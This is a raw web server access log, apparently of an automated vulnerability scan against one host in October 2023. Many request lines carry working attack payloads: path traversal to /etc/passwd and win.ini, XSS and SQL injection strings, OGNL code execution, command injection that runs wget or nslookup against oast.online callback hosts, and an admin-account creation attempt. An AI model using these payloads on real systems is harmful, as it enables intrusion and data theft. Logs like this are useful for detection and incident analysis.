2023-10-13 21:35:17 103.153.214.94 GET /vcac/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 205
2023-10-13 21:35:19 103.153.214.94 GET /vcac/ original_uri=https://bcvt.kontum.gov.vn%2Fvcac 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 203
2023-10-13 21:35:58 103.153.214.94 GET /zabbix/index_sso.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 208
2023-10-13 21:36:01 103.153.214.94 GET /index_sso.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205
2023-10-13 21:36:51 103.153.214.94 GET /zabbix/setup.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207
2023-10-13 21:36:54 103.153.214.94 GET /setup.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 209
2023-10-13 21:36:54 103.153.214.94 GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 207
2023-10-13 21:36:56 103.153.214.94 GET /wp-admin/admin-post.php vrc_cmd=phpinfo 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204
2023-10-13 21:37:33 103.153.214.94 GET /aj.html a=devi 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 631
2023-10-13 21:41:24 103.153.214.94 GET /index.php/Pan/ShareUrl/downloadSharedFile true_path=../../../../../../windows/win.ini&file_name=win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 209
2023-10-13 21:42:33 103.153.214.94 GET /Runtime/Data/ms_admin.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 210
2023-10-13 21:45:02 103.153.214.94 GET /resource/md/get/url url=http://oast.pro 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 211
2023-10-13 21:45:08 103.153.214.94 GET /wp-json/ssa/v1/users - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 206
2023-10-13 21:46:24 103.153.214.94 GET /wp-admin/admin-ajax.php action=directorist_author_pagination 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 210
2023-10-13 21:48:22 103.153.214.94 GET /themes - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208
2023-10-13 21:52:17 103.153.214.94 GET /xmlrpc.php - 443 - 150.158.88.78 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:45.0)+Gecko/20100101+Firefox/45.0 - 200 0 0 377
2023-10-13 21:52:27 103.153.214.94 GET /wp-json/rps_result/v1/route/student_fields - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 207
2023-10-13 21:52:30 103.153.214.94 GET /wp-json/rps_result/v1/route/search_student department_id=1&batch_id=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 205
2023-10-13 21:52:33 103.153.214.94 GET /wp-admin/admin-ajax.php action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 205
2023-10-13 21:52:35 103.153.214.94 GET /phpmyadmin/setup/index.php page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206
2023-10-13 21:52:37 103.153.214.94 GET /setup/index.php page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 211
2023-10-13 21:57:44 103.153.214.94 GET /AccessAnywhere/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 11 0 207
2023-10-13 22:01:08 103.153.214.94 GET / location=search 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 218
2023-10-13 22:01:28 103.153.214.94 POST /cms/content/list - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 211
2023-10-13 22:02:23 103.153.214.94 GET /plugin - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 207
2023-10-13 22:04:50 103.153.214.94 GET /api/get-organizations p=123&pageSize=123&value=cfx&sortField&sortOrder&field=updatexml(1,version(),1) 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 0 2 226
2023-10-13 22:05:27 103.153.214.94 POST /apisix/batch-requests - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 215
2023-10-13 22:05:29 103.153.214.94 GET /api/2WfF0gtxQfDChi5t78i1l8eELM9 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 217
2023-10-13 22:05:53 103.153.214.94 GET /idp/profile/oidc/authorize client_id=demo_rp&request_uri=https://ckjv7uic8b6p3donsoogosyiq4uphxig8.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208
2023-10-13 22:06:00 103.153.214.94 POST /ca/rest/certrequests - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 204
2023-10-13 22:07:43 103.153.214.94 GET /iupjournals/index.php/esj - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 207
2023-10-13 22:09:16 103.153.214.94 POST /admin/login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 353
2023-10-13 22:11:47 103.153.214.94 POST /api.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 0 2 205
2023-10-13 22:18:03 103.153.214.94 GET /admin/airflow/code root&dag_id=example_passing_params_via_test_command 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 301 0 0 215
2023-10-13 22:18:06 103.153.214.94 GET /code dag_id=example_passing_params_via_test_command 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205
2023-10-13 22:22:00 103.153.214.94 GET /Main/Default.aspx viewSurveyError=Unknown+survey"><img%20src=x%20onerror=alert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 207
2023-10-13 22:22:12 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 209
2023-10-13 22:22:22 103.153.214.94 POST /servlet/GetProductVersion - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 209
2023-10-13 22:22:24 103.153.214.94 POST /login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 203
2023-10-13 22:24:17 103.153.214.94 GET /cors_proxy/https:/oast.me/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 209
2023-10-13 22:24:20 103.153.214.94 GET /lib/icinga/icinga-php-thirdparty/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 204
2023-10-13 22:24:21 103.153.214.94 POST /geoserver/wms - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 205
2023-10-13 22:24:23 103.153.214.94 GET /icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 205
2023-10-13 22:24:24 103.153.214.94 GET /icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 206
2023-10-13 22:24:40 103.153.214.94 GET /cgi-bin/mesh.cgi page=upgrade&key=;%27wget+http://ckjv7uic8b6p3donsoogp5i4wbb8czyyy.oast.online;%27 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 204
2023-10-13 22:25:02 103.153.214.94 POST /cgi-bin/nightled.cgi - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 205
2023-10-13 22:26:12 103.153.214.94 GET /cgi-bin/touchlist_sync.cgi IP=;wget+http://ckjv7uic8b6p3donsoog386qnujso3oxh.oast.online; 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 214
2023-10-13 22:27:01 103.153.214.94 GET /contao/"><script>alert(document.domain)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 209
2023-10-13 22:28:05 103.153.214.94 GET /api/change_setting second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 227
2023-10-13 22:28:10 103.153.214.94 GET /module/api.php mobile/webNasIPS 443 - 193.123.37.162 TNAS - 200 0 0 206
2023-10-13 22:30:03 103.153.214.94 GET /mdiy/dict/listExcludeApp query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 211
2023-10-13 22:30:23 103.153.214.94 GET /cgi-bin/downloadFlile.cgi payload=`ls>../2WfF0U8BmZPo1Z19Mj1MxZ8BMg2` 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 203
2023-10-13 22:30:25 103.153.214.94 GET /2WfF0U8BmZPo1Z19Mj1MxZ8BMg2 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 206
2023-10-13 22:30:55 103.153.214.94 GET /download/C:/windows/system.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 211
2023-10-13 22:31:00 103.153.214.94 GET /admin.back<img+src=x+onerror=alert(document.domain)> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 204
2023-10-13 22:32:35 103.153.214.94 GET /SecurityGateway.dll view=login&redirect=true&9OW4L7RSDY=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 209
2023-10-13 22:41:14 103.153.214.94 GET /Admin/Access/Setup/Default.aspx Action=createadministrator&adminusername=biP3Po&adminpassword=EpiY2I&adminemail=test@test.com&adminname=test 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 301 0 0 213
2023-10-13 22:42:13 103.153.214.94 GET /index.php s=example 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 208
2023-10-13 22:42:13 103.153.214.94 GET /wp/wp-content/uploads/wpjobboard/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 208
2023-10-13 22:42:16 103.153.214.94 GET /wp-content/uploads/wpjobboard/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 22:43:24 103.153.214.94 POST /alerts/alertLightbox.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 215
2023-10-13 22:43:47 103.153.214.94 POST /alerts/alertConfigField.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 204
2023-10-13 22:44:16 103.153.214.94 GET /admin/ajax/avatar.php id=-1+union+select+md5(999999999)%23 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 301 0 0 211
2023-10-13 22:44:27 103.153.214.94 GET /widgets/debug.php a=<script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 207
2023-10-13 22:44:33 103.153.214.94 POST /admin/uploads.php id=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 207
2023-10-13 22:46:26 103.153.214.94 POST /js/filemanager/api/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 207
2023-10-13 22:46:28 103.153.214.94 GET /2WfF0VWDu3Q33lviVH2gA8wU0x7.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204
2023-10-13 22:46:53 103.153.214.94 GET /wp-content/backups-dup-lite/dup-installer/main.installer.php is_daws=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 206
2023-10-13 22:46:55 103.153.214.94 GET /wp-content/dup-installer/main.installer.php is_daws=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 209
2023-10-13 22:48:53 103.153.214.94 GET /${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 215
2023-10-13 22:48:56 103.153.214.94 GET /${@java.lang.Runtime@getRuntime().exec("nslookup+ckjv7uic8b6p3donsoogjqjpio8zm7pcr.oast.online")}/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205
2023-10-13 22:49:56 103.153.214.94 POST /dologin.action - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 830
2023-10-13 22:50:14 103.153.214.94 GET /login redirect=%2F 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205
2023-10-13 22:50:22 103.153.214.94 GET /plugins/web/service/search/auto-completion/domain/en.xml q=adm 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 210
2023-10-13 22:52:26 103.153.214.94 POST /wp-admin/admin-ajax.php td_theme_name=Newspaper&v=11.2 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 827
2023-10-13 22:54:57 103.153.214.94 GET /index.php/video/ dl=aHR0cHM6Ly9vYXN0Lm1lLw== 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 208
2023-10-13 22:56:33 103.153.214.94 POST /api/content/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 1117
2023-10-13 22:56:35 103.153.214.94 GET /2WfF0oA6SGzvVP1tnpxiYRJaCVc.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 204
2023-10-13 22:58:16 103.153.214.94 POST /OASREST/v2/authenticate - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 212
2023-10-13 22:58:45 103.153.214.94 GET /creaprezzi.php prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 210
2023-10-13 22:58:45 103.153.214.94 GET /modifica_cliente.php tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205
2023-10-13 22:58:48 103.153.214.94 GET /dati/availability_tpl.php num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script> 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 612
2023-10-13 23:01:48 103.153.214.94 GET /elfinder/php/connector.minimal.php cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 208
2023-10-13 23:04:36 103.153.214.94 GET /photo/combine.php type=javascript&g=core-r7rules/../../../hello.php. 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 208
2023-10-13 23:04:40 103.153.214.94 GET /wp-content/plugins/simple-ajax-chat/sac-export.csv - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205
2023-10-13 23:05:13 103.153.214.94 GET /public/error.jsp errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 206
2023-10-13 23:09:56 103.153.214.94 GET /mims/updatecustomer.php customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 213
2023-10-13 23:11:20 103.153.214.94 POST /classes/Master.php f=delete_item 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 206
2023-10-13 23:11:47 103.153.214.94 POST /classes/Master.php f=delete_supplier 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 207
2023-10-13 23:12:56 103.153.214.94 GET /admin/ajax/pages.php id=(sleep(6)) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 301 0 0 213
2023-10-13 23:13:17 103.153.214.94 POST /admin/asign-single-student-subjects.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 207
2023-10-13 23:16:21 103.153.214.94 GET /navigate/login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 205
2023-10-13 23:16:26 103.153.214.94 POST /api/agent/tabs/agentData - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 0 2 235
2023-10-13 23:20:02 103.153.214.94 GET /goform/login_process username=test%22%3E%3Csvg/onload=alert(document.domain)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 209
2023-10-13 23:20:05 103.153.214.94 GET /goforms/rlminfo - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 647
2023-10-13 23:20:34 103.153.214.94 POST /wp-login.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 205
2023-10-13 23:20:36 103.153.214.94 POST /wp-admin/admin-ajax.php action=check_country_selector 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 205
2023-10-13 23:23:07 103.153.214.94 GET /interact.sh/%2e%2e%2f - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 11 0 211
